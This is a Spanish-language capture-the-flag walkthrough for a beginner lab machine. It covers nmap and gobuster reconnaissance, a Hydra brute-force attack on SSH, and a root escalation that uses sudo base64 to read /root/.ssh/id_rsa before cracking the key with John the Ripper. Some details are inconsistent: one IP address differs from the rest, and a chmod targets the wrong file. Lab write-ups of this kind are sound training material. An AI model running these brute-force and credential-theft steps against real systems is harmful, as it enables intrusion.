Sal y Azúcar
🔍 Dificultad: Principiante
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.71para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -sVC -p- -n --min-rate 5000 192.168.1.71para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 192.168.1.71para obtener más información sobre ese puerto específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Ingresamos la IP y nos encontramos la página por defecto de Apache.

Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://192.168.1.71
Encontramos un directorio summary con el archivo summary.html.

🚀 EXPLOTACIÓN
Con la información obtenida anteriormente, realizamos el comando:
hydra -t 64 -L /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh://192.168.1.71que utiliza la herramienta Hydra para realizar un ataque de fuerza bruta contra el servicio SSH de una máquina con la IP 192.168.1.60.

Al realizar el ataque de fuerza bruta, hemos descubierto la contraseña de info. Sabiendo esto, nos conectamos a través de SSH al usuario con el comando:
ssh info@192.168.1.71
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoamiaún no somos root, por lo que hacemos:
sudo -lpara ver si hay algo para explotar.

Para ello miramos como escalar privilegios en GTFOBins - base64
sudo base64 "/root/.ssh/id_rsa" | base64 --decode
Como deseamos crackear la clave privada OpenSSH, necesitarás convertirla primero en un formato adecuado que John the Ripper pueda entender. Para ello, puedes usar la herramienta ssh2john incluida en John the Ripper, que convierte la clave en un hash adecuado para que John lo procese.
python /usr/share/john/ssh2john.py hash.txt > hash_for_john.txtAhora si realizamos la fuerza bruta.
john --wordlist=/usr/share/wordlists/rockyou.txt hash_for_john.txt
Damos permisos.
chmod 600 hash.txtIniciamos sesión.

Ya somos root.

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
Last updated
Was this helpful?